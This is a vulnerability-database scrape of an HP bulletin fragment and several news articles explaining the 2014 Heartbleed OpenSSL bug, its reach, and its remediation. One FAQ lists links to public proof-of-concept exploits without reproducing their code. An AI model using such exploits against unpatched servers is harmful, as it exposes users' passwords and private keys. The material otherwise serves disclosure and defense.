https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHP Insight Control server deployment\r\n HPSBMU03024\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04267749\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\n
-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhf8kACgkQ4B86/C0qfVnnpwCcD1emgbWP6dG//dmdLN5mR2Rw\r\nKH0AoLcaCs20x8N/G3V6N8e73UmvNcIl\r\n=E+N7\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03033 rev.1 - HP Insight Control Software Components running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30522", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30522", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:11", "description": "_**Heartbleed**_ \u2013 I think now it\u2019s not a new name for you, as every informational website, Media and Security researchers are talking about probably the biggest Internet vulnerability in recent history. It is a critical bug in the OpenSSL's implementation of the TLS/DTLS heartbeat extension that allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data, that the server did not intend to reveal.\n\n \n\n\nAfter the story broke online, websites around the world flooded with the heartbleed articles, explaining how it works, how to protect, and exactly what it is. Yet many didn\u2019t get it right. So based on the queries of Internet users, we answered some frequently asked questions about the bug.\n\n \n\n\n**1.) IS HEARTBLEED A VIRUS?**\n\nAbsolutely NO, It's not a virus. 
As described in our previous [article](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), the Heartbleed bug is a vulnerability residing in the TLS heartbeat mechanism built into certain versions of the popular open source encryption library OpenSSL, a popular implementation of the Transport Layer Security (TLS) protocol.\n\n**2.) HOW DOES IT WORK?**\n\nFor SSL to work, your computer needs to communicate with the server by sending '_**heartbeats**_' that keep informing the server that the client (computer) is online (alive).\n\nThe Heartbleed attack allows an attacker to retrieve a block of the server's memory, up to 64kb, directly in the response from the vulnerable server by sending a malicious heartbeat, and there is no limit on the number of attacks that can be performed. [Technically Explained by Rahul Sasi on [Garage4hackers](<http://www.garage4hackers.com/entry.php?b=2551>)]\n\nIt opens the door for cyber criminals to extract sensitive data directly from the server's memory without leaving any traces.\n\n_xkcd comic http://xkcd.com/1354/_\n\n**3.) DOES THE HEARTBLEED ATTACK RELY ON A MAN-IN-THE-MIDDLE ATTACK?**\n\nNo, it has nothing to do with a Man-in-the-Middle (MitM) attack. But using the Heartbleed attack, one can manage to obtain the private encryption key for an SSL/TLS certificate and could set up a fake website that passes the security verification.\n\nAn attacker could also decrypt the traffic passing between a client and a server, i.e. a perfect man-in-the-middle attack on an HTTPS connection.\n\n**4.) IS IT A CLIENT SIDE OR SERVER SIDE VULNERABILITY?**\n\nTLS heartbeats can be sent by either side of a TLS connection, so the bug can be used to attack clients as well as servers. 
An attacker can obtain up to 64K of memory from a server or a client that uses an OpenSSL implementation vulnerable to Heartbleed (_CVE-2014-0160_).\n\nResearchers [estimated](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>) that two-thirds of the world's servers, i.e. half a million servers, are affected by the Heartbleed bug, including websites, email, and instant messaging services.\n\n**5.) HOW DOES HEARTBLEED AFFECT SMARTPHONES?**\n\nSmartphones are the best practical example of client-side attacks.\n\nAll versions of Android OS include outdated versions of the OpenSSL library, but only Android 4.1.1 Jelly Bean has the vulnerable heartbeat feature enabled by default. Blackberry also [confirmed](<https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html>) that some of its products are vulnerable to the Heartbleed bug, whereas Apple's iOS devices are not affected by the OpenSSL flaw.\n\nGoogle has patched the affected version, Android 4.1.1, but it will take a long time to deliver the updated Android version to end smartphone users, as updates to the majority of handsets are controlled by phone manufacturers and wireless carriers. Until then, users running the affected versions are vulnerable to attacks, and hackers will definitely take advantage of this public disclosure.\n\n**6.) 
WHAT ELSE COULD BE VULNERABLE TO HEARTBLEED?**\n\nIP phones, routers, medical devices, smart TV sets, embedded devices and millions of other devices that rely on OpenSSL to provide secure communications could also be vulnerable to the Heartbleed bug, as these devices are not expected to get updates soon from Google\u2019s Android partners.\n\nYesterday, Industrial Control Systems-CERT also [warned](<http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01B>) critical infrastructure organizations (like energy, utilities or financial services companies) to beef up their systems in order to defend against Heartbleed attacks.\n\n**7.) WHO IS RESPONSIBLE FOR HEARTBLEED?**\n\nWe can't really blame any one developer, especially those who contribute to open source projects without financial motivation.\n\nDr. Robin Seggelmann, a 31-year-old German developer who actually introduced the Heartbeat concept to OpenSSL on New Year's Eve, 2011, says it was just a programming error in the code that unintentionally created the \u201c_Heartbleed_\u201d vulnerability.\n\n\"_In one of the new features, unfortunately, I missed validating a variable containing a length_\", he said. The error went undetected by the code reviewers and everyone else for over two years. He [claimed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) '_I did so unintentionally_'.\n\n**8.) WHO HAS EXPLOITED THIS BUG SO FAR?**\n\nBloomberg accused the National Security Agency (NSA) of knowing about the Heartbleed bug for the last two years. Not only that, the report says the agency was using it continuously to gain information instead of disclosing it to the OpenSSL developers. If that is so, this would be one of the biggest developments in the history of wiretapping ever. 
However, the agency [denied](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>) it, saying the NSA was not aware of Heartbleed until it was made public.\n\nBut when it comes to exploiting any known vulnerability, hackers are most likely to be at the top of the list. The flaw was so widespread that it affected half a million websites worldwide, so after the public disclosure, cybercriminals could reach the sites to steal credentials, passwords and other data before the site operators applied the freely available patch.\n\nThere are multiple proof-of-concept exploits available for the Heartbleed flaw:\n\n * [Python Script](<https://gist.github.com/mpdavis/10171593>)\n * [Metasploit Module](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * [C Code](<https://github.com/HackerFantastic/Public/blob/master/exploits/heartbleed.c>)\n * [NMAP script](<https://github.com/sensepost/heartbleed-poc>)\n * [Python Script by Rahul Sasi](<https://bitbucket.org/fb1h2s/cve-2014-0160/src/2b1fff1a62e29397ff60586557c96989c7b64662/Heartbeat_scanner.py?at=master>)\n\n**9.) CAN CHANGING ACCOUNT PASSWORDS SOLVE THE ISSUE?**\n\nNot exactly, as the Heartbleed attack has the ability to leak anything from the server, including your passwords, credit card details or any kind of personal information. 
But in order to protect your online accounts, you should at least change your passwords immediately for the sites that have resolved the issue, and for the sites not affected by the bug as well, just to make sure that you are safe.\n\nFirst of all, check individually whether the sites you use every day are vulnerable to the Heartbleed bug using the following services or apps, and if you're given a red flag, avoid the site for now.\n\n * [http://filippo.io/Heartbleed/](<https://filippo.io/Heartbleed/>)\n * [Provensec Scanner](<http://provensec.com/heartbleed/>)\n * [GlobalSign SSL Configuration Checker](<https://sslcheck.globalsign.com/>)\n * [ADTsys Checker](<http://seguranca.adtsys.com.br/>)\n * The easiest way to keep yourself safe is to use a new add-on for the Chrome browser, [Chromebleed](<https://chrome.google.com/webstore/detail/chromebleed/eeoekjnjgppnaegdjbcafdggilajhpic>), created by security researcher Jamie Hoyle.\n * To check whether your Android devices are safe, you can install the [Bluebox Heartbleed Scanner](<https://play.google.com/store/apps/details?id=com.bblabs.heartbleedscanner>) available on the Google Play Store. The Bluebox Heartbleed Scanner looks for apps installed on your device that have bundled their own version of OpenSSL, and it also checks the version of the library and whether heartbeat is enabled.\n\nWell, nobody is sure at this point, because Heartbleed is stealthy: it leaves no traces behind, and that makes matters worse.\n\nYou may never know whether you have been hacked using the flaw. This means that there is no way to tell if your information was previously stolen from a site or a service that has now fixed it.\n\nBut if you haven't changed your passwords on the popular sites yet, then yes, your passwords and financial information are still wide open to cybercriminals and spying agencies.\n\n**10.) WHAT SHOULD I DO TO PROTECT MYSELF?**\n\nFirst of all, DON'T PANIC. 
You have to change your password everywhere, assuming that it was all vulnerable before, just to make sure that you are now safe. But hold on... If some sites are still affected by the flaw, then your every effort is useless. It\u2019s up to the site to first fix the vulnerability as soon as possible, because changing the password before the bug is fixed could compromise your new password as well.\n\nIf you own a vulnerable SSL service, then you are recommended to:\n\n * Upgrade the OpenSSL version to [1.0.1g](<https://www.openssl.org/source/>)\n * Request revocation of the current SSL certificate\n * Regenerate your private key\n * Request and replace the SSL certificate\n\nDon't reuse any old passwords. It is also good practice to use two-factor authentication, which means that along with the password, the account requires a freshly generated pass code that shows up only on your personal smartphone before you can get into certain sites.\n\nStay Safe!\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "cvss3": {}, "published": "2014-04-14T20:40:00", "type": "thn", "title": "HeartBleed Bug Explained - 10 Most Frequently Asked Questions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-17T10:28:24", "id": "THN:244769C413FFA5BE647D8F6F93431B74", 
"href": "https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:03", "description": "It has been more than two and a half years since the discovery of the critical [OpenSSL Heartbleed vulnerability](<https://thehackernews.com/2014/04/hacker-exploits-heartbleed-bug-to.html>), but the flaw is still alive, as it appears that many organizations did not properly remediate the serious security glitch.\n\nIt was one of the biggest flaws in the Internet's history, affecting the core security of as many as two-thirds of the world's servers, i.e. half a million servers, at the time of its discovery in April 2014.\n\nHowever, the critical bug still affects more than 199,500 systems even after 2 years and 9 months have passed, according to a [new report](<https://www.shodan.io/report/DCPO7BkV?utm_campaign=news-alert&utm_medium=email&utm_source=app>) published today on Shodan, a search engine that scans for vulnerable devices.\n\n### Over 199,500 Systems Still Vulnerable to Heartbleed\n\n[Heartbleed](<https://thehackernews.com/2014/04/several-tor-exit-nodes-vulnerable-to.html>) (CVE-2014-0160) was a serious bug in OpenSSL's implementation of the TLS/DTLS heartbeat extension that allowed [attackers to read portions](<https://thehackernews.com/2014/04/19-year-old-teenager-arrested-for_16.html>) of the affected server\u2019s memory, potentially revealing users' data that the server isn't intended to reveal.\n\nAccording to Shodan CEO John Matherly, about 199,500 services remain exploitable by the Heartbleed vulnerability due to unpatched OpenSSL instances. 
\n \nThe countries most affected by Heartbleed remain the United States, followed by Korea, China, Germany, France, Russian Federation, United Kingdom, India, Brazil and Italy. \n \nMatherly discovered 42,032 Heartbleed-exploitable services in the United States, 15,380 in Korea, 14,116 in China, and 14,072 services in Germany. \n \nThe top organizations vulnerable to the OpenSSL bug are SK Broadband and Amazon.com, and about 75,000 of the vulnerable services use expired SSL certificates and run Linux 3.x. \n \n[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>) is one of many flaws that often exist unpatched in the wild, and now that the bug is more than two and a half years old and known to everybody, anyone can simply use it to carry out attacks against the still-affected systems. \n \nAround 200,000 is really a troubling number, and one can imagine the danger and damage caused by the bug if exploited. \n \nSoftware bugs may come and go, but this flaw is more critical and probably the biggest Internet flaw in recent history, as it left the contents of a server's memory, where the most sensitive data is stored, exposed to attackers. \n \n\n\n### What are the Steps to Protect your Systems against Heartbleed?\n\n \nIt takes roughly three steps to remediate the Heartbleed bug. \n \n\n\n 1. **Patching**: Update your software to the latest versions of OpenSSL; thankfully almost all organizations have accomplished this step.\n 2. **Creation of New Private Keys**: Creating new private keys will prevent an attacker, who already exploited the flaw before patching, from being able to spy on your encrypted.\n 3. 
**Reissuance of Security Certificates**: This step will eliminate the ability of any attacker to spoof organizations and fool or phish their customers.\n", "cvss3": {}, "published": "2017-01-22T23:27:00", "type": "thn", "title": "Over 199,500 Websites Are Still Vulnerable to Heartbleed OpenSSL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2017-01-23T10:35:46", "id": "THN:847F48AE6816E6BFF25355FC0EA7439A", "href": "https://thehackernews.com/2017/01/heartbleed-openssl-vulnerability.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "[](<https://1.bp.blogspot.com/-YQ3pfHXH8Vc/U0kTASBjW0I/AAAAAAAAbLs/0VNzJlaw61E/s1600/NSA-Heartbleed-vulnerability.jpg>)\n\nThe Bloomberg [claimed](<http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html>) that the U.S. National Security Agency (NSA) knew about the most critical Heartbleed flaw and has been using it on a regular basis to gather \u201c_critical intelligence_\u201d and sensitive information for at least past two years and decided to keep the bug secret, citing two sources \u2018_familiar with the matter_\u2019.\n\n \n\n\nIn response to the above report, NSA has issued a '_94 character'_ statement today denying the claims that it has known about the Heartbleed bug since two years and that it has been using it silently for the purpose of surveillance.\n\n \n\n\n\"_NSA was not aware of the recently identified Heartbleed vulnerability until it was made public_,\" the U.S. 
intelligence agency said on its [Twitter feed](<https://twitter.com/NSA_PAO/status/454720059156754434>).\n\n \n\n\n[Heartbleed](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) is one of the biggest Internet vulnerabilities in recent history that left large number of cryptographic keys and private data such as usernames, passwords, and credit card numbers, from the most important sites and services on the Internet open for hackers. \n\n \n\n\nThe bug resides in the \"_Heartbeat_\" feature of the most secured open source encryption protocol, OpenSSL, which is used by several social networks, search engines, banks and other websites to enable secure connections while transmitting data.\n\n \n\n\nA team of researchers from Codenomicon and Google Security researcher revealed the vulnerability this week that is in the wild since the new version 1.0.1f was released in March 2012. And just after the revelation, OpenSSL released the security Fix for the bug in its version 1.0.1g, but until then the Heartbleed bug made websites, email, instant messaging (IM), including some virtual private networks, on about half a million of the world's widely trusted web servers, open to hackers.\n\n \n\n\nThe birth of the most critical bug Heartbleed was due to a mistake done by a German programmer [Robin Seggelmann](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>) over two years ago while working on a new Heartbeat feature in the OpenSSL.\n\n \n\n\nHe submitted the code of OpenSSL with the heartbeat feature in an update on New Year's Eve, 2011, and an \u201c_oversight_\u201d led to an error that unintentionally created the \u201c**Heartbleed**\u201d vulnerability.\n\n \n\n\nYesterday he said it could be entirely possible that the government intelligence agencies had been making use of this critical flaw over the past two years.\n\n \n\n\nThe fix was released just after, but the users\u2019 data are vulnerable until the vulnerable 
websites implement it. You can only change your password immediately on those websites that are not affected, assuming that they were vulnerable before, just to make sure that you are now safe.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-11T23:21:00", "type": "thn", "title": "NSA denies Report that Agency knew and exploited Heartbleed Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T10:21:51", "id": "THN:EBCB003D7DB7BD8BF73239F9718C6126", "href": "https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "Are you safe from the critical bug Heartbleed? OpenSSL is the encryption technology used by millions of websites to encrypt communication, and it is also used to protect our sensitive data such as e-mails, passwords or banking information. 
\n\nBut a tiny yet most critical flaw called \"[_Heartbleed_](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\" in the widely used OpenSSL opened the door for cyber criminals to extract sensitive data from system memory.\n\n**WHAT IS HEARTBLEED?**\n\nSSL and TLS are known to provide communication security and privacy over the Internet for applications such as websites, email, instant messaging (IM), including some virtual private networks (VPNs).\n\nHeartbleed is a critical bug (**[CVE-2014-0160](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)**) in the popular OpenSSL cryptographic software library. It resides in OpenSSL's implementation of the TLS (transport layer security protocols) and DTLS (_Datagram TLS_) heartbeat extension (RFC6520).\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at _Codenomicon_, while improving the SafeGuard feature in Codenomicon's Defensics security testing tools, and Neel Mehta of Google Security, who first reported it to the OpenSSL team.\n\nSoftware vulnerabilities may come and go, but this bug is more critical, as it has left a large number of private keys and other secrets exposed to the Internet. The Heartbleed bug can reveal the contents of a server's memory, where the most sensitive data is stored, including private data such as usernames, passwords, and credit card numbers. \n\nThis could allow attackers to retrieve private keys and ultimately decrypt the server's encrypted traffic or even impersonate the server.\n\n> \u201c_The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. 
This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users_.\u201d\n\n**HEARTBLEED WORLDWIDE ****IMPACT**\n\nOpenSSL is most widely used cryptographic library for Apache and nginx Web servers, which handles a service of Transport Layer Security (TLS) called **Heartbeat**, an extension added to TLS in 2012. The combined market share of just those two, Apache and nginx, out of the active sites on the Internet is over 66% according to Netcraft's April 2014 Web Server Survey.\n\n \n\n\nMoreover, OpenSSL is used to protect email servers (SMTP, POP and IMAP protocols), chat servers (XMPP protocol), virtual private networks (SSL VPNs), network appliances and wide variety of client side software. Many large consumer sites are also saved by their conservative choice of SSL/TLS termination equipment and software. OpenSSL is also very popular in client software and somewhat popular in networked appliances which have most inertia in getting updates. \n \nSecurity researcher _'Robert Graham_' [scanned the Internet](<http://blog.erratasec.com/2014/04/600000-servers-vulnerable-to-heartbleed.html#.U0bKFfnlbGw>) and found that more than 600,000 servers are vulnerable to heartbleed flaw, including Yahoo.com, imgur.com, flickr.com, hidemyass.com. [[List](<https://github.com/musalbas/heartbleed-masstest/blob/master/top1000.txt>)]\n\n \n\n\nBecause of Heartbleed bug, the Canada Revenue Agency was forced to shut down its electronic tax collection service yesterday and apparently, World's biggest audio platform SoundCloud also logged out its users for fixing this flaw.\n\n[](<https://4.bp.blogspot.com/-ZjFqjwDfyfs/U0bGT6lMcEI/AAAAAAAAbIc/HdTKJsQUB3U/s1600/soundcloud.png>)\n\nYahoo, which has more than 800 million users around the world, also has been [exposed](<https://twitter.com/markloman/status/453502888447586304/photo/1>) by the bug. 
\n\n**HOW HEARTBLEED WORKS?**\n\nIt is not a problem with the TLS/SSL technologies that encrypt the Internet, nor with how OpenSSL works. It is just a dumb coding mistake. \n \nUsing the Heartbeat extension, two computers make sure the other is still alive by sending data back and forth to each other. The client (user) sends its heartbeat to the server (website), and the server hands it right back. If by chance either of them goes down during the transaction, the other one will know through the heartbeat sync mechanism. \n \nWhen that heartbeat is sent, a small amount of the server\u2019s short-term memory, about 64 kilobytes, comes back in the reply from the server, and an attacker can grab it; this can leak sensitive data such as message contents, user credentials, session keys and server private keys. By sending heartbleed requests multiple times, an attacker is able to fetch more memory contents from the server.\n\nThis means that everything and anything in memory, such as SSL private keys, user keys used for your usernames and passwords, instant messages, emails, business-critical documents and communication, and much more, is vulnerable to cyber criminals. At this phase, you have to assume that it is all compromised. \n \nAbout two-thirds of web servers rely on OpenSSL, which means the information passing through hundreds of thousands of websites could be vulnerable. \n \nSo far, security experts have found no direct evidence that anyone has managed to use the bug to steal information. The vulnerability has been fixed in OpenSSL v1.0.1g. \n \nMajor websites, including Gmail and YouTube, Facebook, Tumblr, Yahoo and Dropbox, have fixed the problem, but there are still thousands of websites that are yet to fix it. Users are advised to change their passwords only on those affected websites that tell you they've fixed the problem. 
**[READ MORE](<https://thehackernews.com/2014/04/how-to-protect-yourself-from-heartbleed_10.html>) on how to protect yourself from Heartbleed bug**. \n \n**Related Important Articles:** \n \n \n \n \n\n\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n", "cvss3": {}, "published": "2014-04-10T07:00:00", "type": "thn", "title": "How Heartbleed Bug Exposes Your Passwords to Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-12T09:00:54", "id": "THN:8D999AEE5218AD3BFA68E5ACE101F201", "href": "https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:17:12", "description": "[](<https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s1600/Android-blackberry-apple-iphone-heartbleed.jpg>)\n\n[Heartbleed](<https://thehackernews.com/search/label/Heartbleed%20bug>) has left a worst impression worldwide affecting millions of websites and is also supposed to put millions of Smartphones and tablets users at a great risk.\n\n \n\n\nHeartbleed is a critical bug (_[CVE-2014-0160](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)_) in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS/DTLS heartbeat extension, which allows attackers to read portions of the affected server\u2019s memory, 
potentially revealing users data such as usernames, passwords, and credit card numbers, that the server did not intend to reveal.\n\n \n\n\n[OpenSSL](<https://thehackernews.com/search/label/OpenSSL>) is a widely-used cryptographic library which implements the SSL and TLS protocol and protects communications on the Internet, and mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n \n\n\nBut to assume that the users using desktop browsers to visit websites are vulnerable to the Heartbleed bug, will be wrong. Despite 40-60 billion active Smartphone applications may be sharing some of those same servers or connect to their own group of servers that may also be compromised.\n\n \n\n\n**ANDROID**\n\nGoogle wrote in an update on its Online Security [blog](<https://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html>) on Wednesday, emphasizing that Android was not vulnerable to the Heartbleed bug, except for a very specific version and can you guess that so called specific version??\n\n \n\n\n[Android](<https://thehackernews.com/search/label/Android>) 4.1.1 Jelly Bean, the one which makes up the majority of Android devices around the world, and which relies on the vulnerable version of OpenSSL.\n\n \n\n\nGoogle didn\u2019t reveal the actual figure that are vulnerable to the bug, but according to the latest [dashboard ](<https://developer.android.com/about/dashboards/index.html?utm_source=ausdroid.net>)released by Google, it is estimated that around 34.4% of the Android devices in use today are running the Android 4.1.x version. \n\n \n\n\nEven last September Google announced that it had activated one billion devices. This means that the minimal number is likely to be in the millions. 
So, one can imagine how many Smartphones and tablets were at risk.\n\n \n\n\nWell, Google has released the patches for Android 4.1.1 which is being distributed among the Android partners.\n\n \n\n\n**APPLE**\n\n[Apple](<https://thehackernews.com/search/label/Apple>) users can be relaxed knowing that their devices running iOS and OS X are not affected by the most critical security flaw, Heartbleed.\n\n \n\n\n\"_Apple takes security very seriously. IOS and OS X never incorporated the vulnerable software and key web-based services were not affected_,\" Apple told [Re/code](<http://recode.net/2014/04/10/apple-says-ios-osx-and-key-web-services-not-affected-by-heartbleed-security-flaw/>).\n\n \n\n\nInstead using OpenSSL, Apple relies on different SSL/TLS libraries called Secure Transport, which was hit by its own very serious bug in February outcropping the possibility for [man-in-the-middle (MitM) attacks](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>) \u2014 though it wasn't as dangerous as the recent OpenSSL Heartbleed security Flaw.\n\n \n\n\nBut still Apple users were not exempted completely, as the users using BBM for private messages on iOS might have been vulnerable to this flaw.\n\n \n\n\n**BLACKBERRY**\n\nBlackberry [confirmed](<http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB35882&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl>) that some of its products, including Secure Work Space for iOS and Android, and BlackBerry Link for Windows and Mac OS and even BBM for iOS and Android were vulnerable to the Heartbleed security flaw. 
The figure of affected users is not least, as about 80 million people use BBM service.\n\n \n\n\nThey have also assured that BlackBerry Smartphones and tablets, BlackBerry Enterprise Server 5, BlackBerry Enterprise Service 10, and the BlackBerry Infrastructure are not affected by the flaw and are fully protected.\n\n \n\n\n**Related Important Articles:**\n\n * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n", "cvss3": {}, "published": "2014-04-13T08:19:00", "type": "thn", "title": "Billions of Smartphone Users affected by Heartbleed Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-13T19:32:50", "id": "THN:4868B616BCBA555DA2446F6F0EA837B0", "href": "https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-27T09:18:11", "description": "[](<https://4.bp.blogspot.com/-iF_r9MR_7MM/U0boktQvR9I/AAAAAAAAbI4/p8kgxWrFu4c/s1600/protect-from-Heartbleed-bug.jpg>)\n\nMillions of websites, users' passwords, credit card numbers and other personal information may be at risk as a result of the [**Heartbleed security flaw**](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>), a vulnerability in 
widely used cryptographic library '**_OpenSSL_**'. [[READ DETAILS HERE](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)] \n \nNetcraft [survey](<http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html>) says that about half a million widely trusted active websites on the internet are vulnerable to the heartbleed bug, which means the information transmitting through hundreds of thousands of websites could be vulnerable, despite the protection offered by encryption techniques.\n\n \n\n\nAccording to Netcraft, \u201c_the heartbeat extension was enabled on 17.5% of SSL sites, accounting for around half a million certificates issued by trusted certificate authorities. These certificates are consequently vulnerable to being spoofed (through private key disclosure), allowing an attacker to impersonate the affected websites without raising any browser warnings._\u201d\n\n \n\n\nAmong the trusted names running OpenSSL is Yahoo!, which has been affected by this critical flaw. Yes, Yahoo Inc., which boasts more than 800 million users worldwide, is among the Internet services that could be potentially hurt by Heartbleed.\n\n \n\n\nThe bug leaks the below given information, although Yahoo! has since patched its systems.\n\n[](<https://1.bp.blogspot.com/-C1vFJyYZ5Ig/U0bIgPoTloI/AAAAAAAAbIo/EjLY1KOHb9w/s728/yahoo-password-cracking.png>)\n\nThe Popular sites which exhibit support for the TLS heartbeat extension also include Twitter, Facebook, GitHub, Bank of America, DropBox are not currently vulnerable, but it is unclear that they were vulnerable few days ago.\n\n \n\n\nIncluding Yahoo!, Flickr, Tumbler, Google, OKCupid and even the anonymous search engine DuckDuckGo was vulnerable, which has now been fixed.\n\n \n\n\nYahoo Inc. 
